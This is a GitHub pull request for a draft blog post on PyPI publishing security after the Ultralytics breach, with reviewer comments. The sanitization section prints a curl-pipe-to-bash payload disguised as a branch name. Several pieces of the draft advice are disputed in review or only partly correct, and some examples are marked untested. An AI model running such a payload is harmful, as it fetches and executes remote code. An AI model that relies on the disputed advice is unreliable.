Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

feat(blog): blog post--lessons learned on publish security #538

Open
wants to merge 15 commits into
base: main
Choose a base branch
from
307 changes: 307 additions & 0 deletions _posts/2024-12-13-python-packaging-security.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,307 @@
---
layout: single
title: "Staying Secure: Best Practices for Publishing Python Packages to PyPI"
lwasser marked this conversation as resolved.
Show resolved Hide resolved
excerpt: "blah"
lwasser marked this conversation as resolved.
Show resolved Hide resolved
author: "Leah Wasser"
permalink: /blog/python-packaging-security-publish-pypi.html
header:
overlay_image: images/headers/pyopensci-inessa.png
overlay_filter: rgba(20, 13, 36, 0.3)
categories:
- blog-post
- community
classes: wide
toc: true
comments: true
last_modified: 2024-12-13
---

## Is your PyPI publication workflow secure?

The recent Python package breach [involving Ultralytics](https://blog.pypi.org/posts/2024-12-11-ultralytics-attack-analysis/) has highlighted the need for secure PyPI publishing workflows. Hackers exploited a GitHub workflow (`pull_request_target`) to inject malicious code, which was published to PyPI. Users who downloaded the package unknowingly allowed their machines to be hijacked for Bitcoin mining.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

a GitHub workflow (pull_request_target)

pull_request_target is not a workflow, it's one of the events that may trigger a workflow run. A workflow may “subscribe” to different events like push and pull_request, this is just another event type with elevated privileges in its security context.

unknowingly allowed their machines to be hijacked for Bitcoin mining.

Not only that, but they also did that in Google Colab which got their accounts banned pretty swiftly...

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

OOOOH no way. i missed the Google Colab part!! that's a pretty bold move for a hacker? maybe they were new hackers ?

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

See googlecolab/colabtools#4979.

It was unwitting end users who installed the hacked package on their Colab accounts, and the Google automation then suspended their accounts:

Connection failed
This account has been blocked from accessing Colab runtimes due to suspected abusive activity. This does not impact access to other Google products. If you believe this has been done in error, review the usage limitations and file an appeal.

Google was pretty quick in restoring accounts, but it happened to a lot of accounts: googlecolab/colabtools#4979 (comment)


> Hackers tricked a Python package into running bad code, using other people’s computers to mine Bitcoin without permission. Yikes!

While unsettling, there’s a silver lining: the PyPI security team had already addressed most of the issues that caused this breach.


{% include pyos-blockquote.html quote="Because the Ultralytics project was using Trusted Publishing and the PyPA’s publishing GitHub Action: PyPI staff, volunteers, and security researchers were able to dig into how maliciously injected software was able to make its way into the package." author="Seth Larson, PSF Security Expert" class="highlight magenta" %}

This incident underscores the importance of understanding Python packaging security best practices.

In this blog post, we'll cover the lessons learned that you can apply - TODAY - to your own Python packaging workflows!

<div class="notice" markdown="1">
## TL&DR Takeaways

The Ultralytics breach is a wake-up call for all maintainers: secure your workflows now to protect your users and the Python ecosystem. Start with these key actions:

### 🔐 Secure your workflows 🔐
- 🚫 Avoid risky events like `pull_request_target` and adopt release-based workflows.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It's not immediately clear what makes a workflow “release-based”. I haven't read past this point at the time of writing this comment, though.
Rephrase, perhaps?

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

good point - fixed!!

  • 🚫 Avoid risky trigger events in GitHub actions like pull_request_target
  • Consider using publish workflows on GitHub that are triggered by a GitHub release rather than a pull request merge.

- ♻️ Don’t cache dependencies in your publish workflows to prevent tampering.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

That's probably an oversimplification. Not caching the deps may as well lead to something like this if the transitive deps are unpinned and get updated in uncontrolled manner. The problem was that the cache was poisoned in a job with a security context that had high privileges and then, another job picked it up, effectively reusing what that first one “pinned” in the installed deps.

But if there's no cache, a compromised transitive dependency can be downloaded from PyPI, resulting in the same problem.

Security exists in context and not in isolation. It should come from a place of understanding how different bits fit together.

That said, I wouldn't make a call of whether using caching or not will save us all. The problem was that it was possible to compromise the cache that ended up being used.

I think it's possible to use cache securely by having separate cache keys unique to the dist building job. So caches for building the dists and testing them would not leak into each other. That's the real fix for cache.

Another side of this is the supply chain problem, which cache ended up being a part of in this instance. But as I mentioned earlier, the supply chain could be compromised differently, without cache being a factor. The solution to this is pinning your dependencies. This means recording every single version number for every single transitive dependency there is. One of the low-level tools to use for this is pip-tools, in the context of pip install (until we have PEP 751, that is). Non-pip installers have different mechanisms. With pip, you can use pip install -r requirements.in -c constraints.txt, where requirements.in would contain a direct and unrestricted dependency list, and constraints.txt would set the entire tree to exact versions. A complete solution is usually integration of different aspects through multiple tools (or a "one-tool-to-rule-them-all" which some projects aim to become). I've been taking this to extremes with "DIY lock files" in https://github.com/webknjaz/ep2024-multilock-toy-template / https://github.com/ansible/awx-plugins/tree/2c2b22c/dependencies/lock-files.
Additionally, there's --require-hashes which also records every single dist file hash, not just version (this is not compatible with -c, though, due to a bug in pip).

To summarize, the solution here is to be in control of your deps, make sure their updates are transparent and controllable on all the levels, and to know what influences them… Out of the context, disallowing caching is a band-aid at best. But it may be harmful in that it would cultivate a false sense of security.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

ok. This is super helpful. I could remove the caching part altogether, given so many moving pieces and caching seems more nuanced then just locking down the workflow itself with better triggers and tighter permissions. But I also have a question about the dependencies. Because it is my understanding and experience that pinning all deps can also be highly problematic for users. For instance, if you have an environment with many different packages and try installing a package with pinned dips, that could lead to significant user issues.

Unless we're just talking about dips in the workflow itself, such as hatch, pypa/build, etc.

web apps make sense to pin but i can't quite wrap my head around pinning deps for a package. Could you please help me understand? And do you agree - maybe for more beginner users we just drop caching altogether as a topic?

- If you reference branches in a pull request, clean or sanitize branch names in your workflow.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great suggestions!! I may add these links lower down in the post at the end, so the takeaways are just text.. but I'll definitely include them. This is what I have now:

  • If you reference branches in a pull request, clean or sanitize branch names in your workflow.
  • Consider using zizmor to check your GitHub workflows for security vulnerabilities!

i haven't used zizmor yet but i saw a package that Hugo maintains uses it so i may try it out with stravalib and pyosmeta!!


### Lock down GitHub repo access
- 🔒 Restrict repository access to essential maintainers only.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

While the principle of the least privilege is good to follow, this specific breach wasn't because somebody had direct access to the repo (the attack wouldn't need to be as sophisticated), but because the security context used for PRs from arbitrary forks was set to trusted w/o performing the necessary precautions.

- ✅ Add automated checks to ensure releases are authorized and secure.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think this is mostly about setting an environment in the job and making sure that environment has required reviewers in the repo settings.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Looking at the blog posts, it seemed like the hackers somehow got direct access to that repo. Did i read that wrong?


### Strengthen PyPI security
- 🔑 Set up Trusted Publisher for tokenless authentication with PyPI.
lwasser marked this conversation as resolved.
Show resolved Hide resolved
- 📱 Enable 2FA for your PyPI account and store recovery codes securely.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

2FA is already required for any uploads to PyPI since this year. There's no way around anymore. That said, long-living and over-scoped API keys may leak and should be rotated periodically. It's much easier to use Trusted Publishing instead — it uses short-lived tokens every time, they expire in 15 minutes upon creation and one doesn't need to do a thing to revoke them.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ok, I hear you. I've added this:

  • Delete old GitHub tokens that you are no longer using. And Refresh existing tokens that you need periodically.

I'll likely remove 2FA altogether, given it's required. I doubt most users understand why making tokens infinitely valid is bad!


These steps will significantly reduce risks to your packages, contributors, and the broader Python ecosystem. Don’t wait—start securing your workflows today.
lwasser marked this conversation as resolved.
Show resolved Hide resolved
</div>


## A call to action if you are publishing to PyPI using GitHub actions

What's important for us is that this event highlights the need for our ecosystem to follow and understand secure PyPI publishing practices and carefully monitor workflows. And the good news here is that if you are already publishing to PyPI using a GitHub action, there are things you can do RIGHT NOW to ensure your build is more secure.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
What's important for us is that this event highlights the need for our ecosystem to follow and understand secure PyPI publishing practices and carefully monitor workflows. And the good news here is that if you are already publishing to PyPI using a GitHub action, there are things you can do RIGHT NOW to ensure your build is more secure.
What's important for us is that this event highlights the need for our ecosystem to follow and understand secure PyPI publishing practices and carefully monitor workflows. And the good news here is that if you are already publishing to PyPI using the GitHub action, there are things you can do RIGHT NOW to ensure your build is more secure.

You meant pypi-publish, right? Or did you mean GitHub Actions CI/CD as an ecosystem? Or a GitHub Actions Workflow?

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

here, I'm referring to GitHub actions in general but our examples do use the pypa action . But you are making a good point.

i'll come back to this comment and will make sure that point is super clear in the text.


For this post, we will use [this workflow that pyOpenSci has setup](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml) that was reviewed and developed by both a PyPI maintainer and also several core pyOpenSci community members that have significant knowledge about best practices in publishing to PyPI.

Below are actionable steps you can take to enhance security when publishing Python packages to PyPI using GitHub actions.


## 1. Avoid `pull_request_target` and consider release-based workflows

The [`pull_request_target`](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target) event in GitHub Actions that Ultralytics used, allows workflows to run with elevated permissions on the base branch, even when triggered by changes from a fork. Thus, when used as a trigger to push a release to PyPI, your workflow becomes vulnerable.

Instead, consider adopting a **release-based workflow**:

- Trigger publication workflows only on versioned releases.
- Ensure workflows related to publishing are explicitly scoped to `release` events or tagged commits.

Notice in our workflow below that we use a `release` trigger to avoid these risks. While we also have a `push` trigger, it never triggers a publication to PyPI.


```yaml
name: Publish to PyPI
on:
# By using release - only people with admin access to make releases to our repo can trigger the push to PyPI
release:
types: [published]
push:
branches:
- main
```

In the example above, the push trigger is only used to test that the package distribution files can be built. To ensure that a package is only ever published on a release, we include a conditional in the publish-to-PyPI step:

```yaml
- name: Publish package to PyPI
# Only publish to real PyPI on release
if: github.event_name == 'release'
```

This approach ensures that the publishing step is tightly controlled, reducing the risk of malicious activity in your workflow.

## 2. Don’t cache package dependencies in your publish step

Caching dependencies involves storing them to be reused in future workflow runs. This approach saves time, as GitHub doesn’t need to redownload all dependencies each time the workflow runs.

TODO: create graphic about reusing dependencies

However, caching dependencies can allow attackers to manipulate cached artifacts, such as dependencies. If this happens, the workflow may pull in compromised versions from the cache during the next run.

**Takeaway:** Don’t cache dependencies in your Python package publishing workflow. Always download fresh dependencies to ensure you’re using the latest secure versions of any packages your project depends on.

Below is an example of a build that caches dependencies.

```yaml
name: Build and Test

on:
push:
branches:
- main
pull_request:

jobs:
build:
runs-on: ubuntu-latest

steps:
# Step 1: Check out the repository
- name: Check out repository
uses: actions/checkout@v3

# Step 2: Set up Python
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.12'

# Step 3: Cache dependencies
- name: Cache dependencies
Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is not tested and could be wrong.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is one of the uses but oftentimes, building is performed by pypa/build so it'd be just pip install build and not multiple direct deps as one might expect from a requirements.txt file. So the example seems a bit unrealistic, except for some untypical projects with surprising build automation required.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

oh, right, good point. What is a good example of caching dependencies (other than what we say with ultranalytics)? I use caching when i'm publishing.

we pip install hatch and use hatch build

What do you think about removing the example and just telling people that if they do cache dependencies for any reason, don't do it when the build is for publishing?

for instance, doing it for a website build could be ok if it's a preview, etc. vs publishing a package?

uses: actions/cache@v3
with:
path: ~/.cache/pip
key: ${{ runner.os }}-pip-${{ hashFiles('**/requirements.txt') }}
restore-keys: |
${{ runner.os }}-pip-

# Step 4: Install dependencies
- name: Install dependencies
run: pip install -r requirements.txt

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This example shows installing some abstract deps but does not demonstrate using them (as in, running python -Im build).


# Step 5: Publish to PyPI
...

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

NEVER EVER build in the same job as publishing. This is an insecure practice. I had to recently spell it out @ https://github.com/marketplace/actions/pypi-publish#Non-goals.

One of the reasons (probably the most important one in the context of this document) is that Trusted Publishing requires one to increase privileges of the publishing job, giving it access to OIDC. This privilege must not be shared with transitive build dependencies. Such a privilege escalation may allow a malicious actor to impersonate your workflow in systems beyond PyPI (but also increases the poisoning surface for the dists published on PyPI).

Ultimately, the only workflow shape I'm willing to call supported is documented @ https://packaging.python.org/en/latest/guides/publishing-package-distribution-releases-using-github-actions-ci-cd-workflows/.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i will add a link to that packaging guide. And i see why this example may direct users incorrectly. in fact, i remember you telling me this last year when we were working on pyosMeta to update that build!

```

## 4. Use Trusted Publisher for PyPI

If you only [publish locally to PyPI using the command line](https://www.pyopensci.org/python-package-guide/tutorials/publish-pypi.html), you need to use a PyPI token. However, if you’re using GitHub Actions to automate your publishing process, setting up **Trusted Publisher** is a more secure option.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

IIRC @woodruffw was against claiming that TP is more secure, so we settled on saying that it's “as secure” but is more convenient in many regards in the README of pypi-publish.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

oh. that's different from my understanding of trusted publishing. I thought that TP provides a secure "pipeline" between the workflow and PyPI vs. a token that I suppose provides access to PyPi, but it doesn't necessarily directly connect to the workflow (i.e., you can specify a specific environment and workflow file with a trusted publisher.

This statement challenges my understanding of trusted publisher. @woodruffw IF you happen to have a moment to clarify that would be super helpful.

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

TP is more secure in that the tokens are short-lived compared to perpetual API tokens.

And it seems like the hackers got hold of forgotten API tokens in the repo to be able to make the second pair of releases in this case.


A Trusted Publisher setup creates a secure "pipeline" between PyPI and your GitHub repository because:

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Personally, I like calling it a “trust link”. Perhaps, @woodruffw would have opinions on the wordings/metaphors here.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I like the pipe idea as it's a visual people can understand even if it's not perfect. An isolated pipe or channel where files (sdist, wheel) can "travel" and be verified between GitHub and PyPI. 🤷🏻‍♀️ maybe there is a better visual but i want to help people understand why this is a good way to design a build / publish workflow.

I want to create a graphic to help people understand this, as I think some of these important concepts get lost because it's all so technical!

But i say that knowing that you and others are experts - i'm just trying to simplify so more people can apply some of these things!

- PyPI is allowed to authenticate your builds directly, so no additional configuration is required.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Not builds, but uploads. We make “publish” attestations, as the action cannot know how the dist it sends over was actually built. It should be built in a separate job. But theoretically could be built elsewhere and downloaded from S3 or wherever.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed!

- It restricts publishing to specific workflows and environments defined in your repository.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Technically, the environment is attached to a job in a workflow. This is the information PyPI would receive when looking up the trust link. Environments, however, can also be additionally configured in repository settings on GitHub. The recommended environment name is pypi. And the recommended configuration is having required reviewers (which would pause said job on GH, requiring a human to click the button).

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@webknjaz I have not set this up myself and just noticed this feature after reading your comment. thank you. I really don't think people know about this stuff.

TODO: I'll add a small note about how to do that in the post with a screenshot of what the interface looks like.


This setup eliminates the need to store sensitive tokens as GitHub secrets, significantly reducing the risk of token theft or unauthorized publication.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't fully agree with that note on unauthorized publication. Unauthorized publication can be prevented by controlling the trigger of the release process. Or setting up required reviewers in the environment used in the publishing job (usually called pypi) — this would prevent said job from even starting until a trusted human being clicks a button on GH. Recording the environment name on the PyPI side, though, allows restricting the “identity” of the workflow+repo+env that is to be considered “trusted”. But this only works on the authentication level between PyPI and GH. But not between GH and human, which is what you also want to secure.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

ok, I am still working through your comments, but after I plan to reread the entire thing, and i'll reframe it. concepts:

  1. trusted publisher is a great way to go - not necessarily BETTER than tokens. Perhaps more streamlined and simpler to set up. it's think we just suggest people do that. it eliminates GitHub secretes AND it eliminates needing to set up a PyPI project FIRST using a user-scoped token (because the project doesn't exist on PyPI yet).

People will forget the step of updating their token to be project-level scope. So a trusted publisher, in my mind, is less risky for a user because it's simpler.

  1. For your build workflows, use environments that are secured and controlled by trusted humans -- (I can provide screenshots of how to set that up). This means that a publish workflow won't run until someone with access to the repo physically OKs the build.

maybe there is a graphic here to simplify and help people understand what you wrote above?

gh + human authorization
github + PyPI authorization

These are two different but related and important concepts. And they are high-level. like if people need to remember 2 things - these are the things.


### How to get started

[PyPI provides a great guide to getting started with Trusted Publisher](https://docs.pypi.org/trusted-publishers/adding-a-publisher/).

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

cc @woodruffw apparently we forgot to update the screenshots in the warehouse doc to show pypi as the environment name.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Oops! I can open an issue if that is helpful in warehouse?


The basic steps associated with Trusted Publisher are:
1. Go to your PyPI account and add a trusted publisher workflow to your account.
2. Fill out a form that looks like the one below. Notice that it asks for your workflow name, (optional) environment, and package name.

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Maybe, don't mention that the environment is optional if this post is focused on maximizing security.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

good point!! changed to (they will see optional in the image!)

environment (STRONGLY recommended)

3. Update your GitHub action workflow to reference the Trusted Publisher configuration.
lwasser marked this conversation as resolved.
Show resolved Hide resolved

<figure>
<picture>
<source srcset="/images/python-packaging/trusted-publisher-form.webp" type="image/webp">
<img src="trusted-publisher-form.webp" alt="PyPI Trusted Publisher form example showing settings for linking a GitHub repository with PyPI for secure publishing." loading="lazy">
</picture>
<figcaption>
Example of the PyPI Trusted Publisher form, used to securely link a GitHub repository with PyPI for publishing Python packages. Trusted Publisher reduces the risk of token theft and improves overall security.
</figcaption>
</figure>

You can see how to set up GitHub Actions securely in our own [PyPI publishing GitHub workflow](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml), which follows the Trusted Publisher approach.

**Note:** Trusted Publisher workflows are currently only available for GitHub. Support for GitLab may be coming in the future—stay tuned!

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

In the doc you already linked, there's an example for GitLab as well: https://docs.pypi.org/trusted-publishers/adding-a-publisher/#gitlab-cicd. There are 4 platforms that support this mechanism already, and I saw some Bitbucket folks asking around whether they can integrate.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

fixed the breakout and added that link!! I somehow read that GitLab support wasn't available yet, but obviously, I wasn't looking in the right place! thanks!

{: .notice }

## 5. Create a dedicated environment for publish actions

Use isolated environments in combination with Trusted Publisher in your GitHub workflow to publish to PyPI.
Isolated environments ensure your publishing process remains secure even if other parts of your CI pipeline are compromised.

If you look at the pyometra workflow, notice that we have an [environment called `pypi`](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml#L57) that is used for trusted publishing. By setting this up, we have created a direct pipeline between this action and PyPI via the PyPI environment and the trusted publisher setup, which refers to the workflow file's name.
lwasser marked this conversation as resolved.
Show resolved Hide resolved

```yaml
publish:
name: >-
Publish Python 🐍 distribution 📦 to PyPI
if: github.repository_owner == 'pyopensci'

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I started using the exact repository ID some time ago. This is more accurate and would survive renames and transfers:

Suggested change
if: github.repository_owner == 'pyopensci'
if: github.repository_id == 174412809

(looked up @ https://api.github.com/repos/pyOpenSci/pyopensci.github.io)

If you want to check for the org, you could use the org ID. Org names are mutable and if the org gets renamed for whatever reason (might be a user account that hosts a repo in some cases), this check would break.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

oh wow - I've always used the username as the conditional value. The only challenging piece here for users is they'd have to use the API to get that repo id value. I don't see a clear way to get it from the GitHub GUI. we could make a note about an owner name being mutable however and provide the command to find the ID (it requires a token i think?).

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'd just stick with the org/username, it's much more readable and transparent.

Org renames/transfers are pretty rare. And you'd notice the problem right away after the first deploy and it's an easy fix.

needs:
- build
runs-on: ubuntu-latest
environment:
name: pypi
url: https://pypi.org/p/pyosmeta
```

## 6. Sanitize a branch name in your workflow, before calling it!

One of the critical issues in the Ultralytics breach was that attackers crafted a [**malicious branch name containing a shell script**](https://github.com/ultralytics/ultralytics/pull/18020) 🤯. This script executed within the GitHub Action workflow because the branch name was directly referenced using `github.ref`.

When `github.ref` is used without sanitization, malicious content embedded in branch names can be executed. This is known as a **template injection**:

{% include pyos-blockquote.html quote="...is a classic GitHub Actions template injection: the expansion of `github.head_ref || github.ref` is injected directly into the shell’s context, with no quoting or interpolation.." author="https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection" class="highlight magenta" %}

Because the branch name wasn’t sanitized, it was treated as a shell command and executed with full permissions. Yikes!


### Problem: a GitHub action that calls 'ref' to the workflow that could be manipulated

Below is an example of a potentially vulnerable packaging workflow. If the branch name contains malicious content, this workflow could execute harmful commands:

```yaml
jobs:
example-job:
runs-on: ubuntu-latest
steps:
- name: Run a script
run: |
echo "Running script for branch: $GITHUB_REF"
```

### Solution: Sanitize the Branch Name

To fix this, sanitize or clean the branch name before using it in your workflows. A small Bash cleanup step removes unexpected or unsafe characters.

```
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
```
```yaml

jobs:
example-job:
runs-on: ubuntu-latest
steps:
- name: Sanitize branch name
run: |
SAFE_BRANCH=$(echo $GITHUB_REF | sed 's/[^a-zA-Z0-9_\-\/]//g')
echo "Sanitized branch name: $SAFE_BRANCH"
echo "Running script for branch: $SAFE_BRANCH"
```

<div class="notice" markdown="1">
How cleaning the branch name works:

1. echo $GITHUB_REF: Outputs the branch name.
2. sed 's/[^a-zA-Z0-9_\-\/]//g': Removes any characters that are not letters, numbers, dashes, underscores, or slashes, ensuring the branch name is safe.

Try It:

Test how sanitization works by running this command in your shell:
the branch name: $({curl,-sSfL,raw.githubusercontent.com/test/test/123456d8daa0b26ae0c221aa4a8c20834c4dbfef2a9a14/dummyfile.sh} | bash)


```bash
# Input string
input='$({curl,-sSfL,raw.githubusercontent.com/test/test/123456d8daa0b26ae0c221aa4a8c20834c4dbfef2a9a14/dummyfile.sh} | bash)'

# Sanitization step
sanitized=$(echo "$input" | sed 's/[\$\{\}\|\(\)]//g')

# Output the sanitized string
echo "Original: $input"
echo "Sanitized: $sanitized"
```

This strips out any characters that can be used to call shell commands.

</div>

The good news here is that if you use a release-based workflow as discussed earlier, then you don't have to worry about branch names. And yes you can always make a release from a different branch!

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Add: a few sentences on

delete old tokens and secrets containing pypi tokens... this is easy for people to do and good for them to know about.

Restricting publish workflows to tagged releases significantly reduces the risk of such attacks.


## GitHub & PyPI security tips

In addition to securing your workflows, lock down your accounts and repositories:

- **Enable 2FA (2-factor authentication)** for both PyPI and GitHub to prevent unauthorized access. Store recovery codes securely (e.g., in a password manager).
- **Revoke old tokens**: If you've previously created PyPI API tokens or GitHub secrets, delete any unused or outdated ones.
- **Restrict repository access**: Limit write access to a trusted subset of maintainers. Most contributors don’t need direct write access, which reduces security risks.

## Learn More

pyOpenSci follows best practices for PyPI publishing using our custom GitHub Actions workflow. Check out our tutorial on Python packaging here:
👉 [pyOpenSci Packaging Tutorial](https://www.pyopensci.org/python-package-guide/package-structure-code/python-package-structure.html)
👉 Join our discourse here

<div class="notice" markdown="1">
## Get involved with pyOpenSci

* Keep an eye on our [events page](/events.html) for upcoming training events.

Follow us on social platforms:

* [<i class="fa-brands fa-discourse"></i> Discourse](https://pyopensci.discourse.group/)
* [<i class="fa-brands fa-mastodon"></i> Mastodon](https://fosstodon.org/@pyopensci)
* [<i class="fa-solid fa-cloud"></i> Bluesky](https://bsky.app/profile/pyopensci.bsky.social)

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Tip

Pro tip: consider updating the Bluesky username to pyopensci.org. This can be configured and verified in like 3 minutes (through either DNS or a .well-known document on the website, but adds credibility to the account). You can create a repository in the org, call in .well-known, and add a file with the account DID as follows: webknjaz/.well-known@5a3c310. Just don't forget to enable Pages in the repo settings before clicking Verify.

Copy link
Member Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

WOAH!! i never knew about this for bluesky!.
thank you for this tip - and for all of the thoughtful feedback. i'm going to work on this some more tomorrow!

* [<i class="fa-brands fa-linkedin"></i> LinkedIn](https://www.linkedin.com/company/pyopensci)
* [<i class="fa-brands fa-github"></i> GitHub](https://github.com/pyOpenSci)

If you are on LinkedIn, you should [subscribe to our newsletter, too](https://www.linkedin.com/newsletters/7179551305344933888/?displayConfirmation=true).
</div>

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please, replace this screenshot with one having pypi typed into the last field. release is misleading — we've updated it in many places in the PyPI docs already, and on the website form, in the placeholder. But it looks like I missed the screenshots.

Binary file not shown.
Loading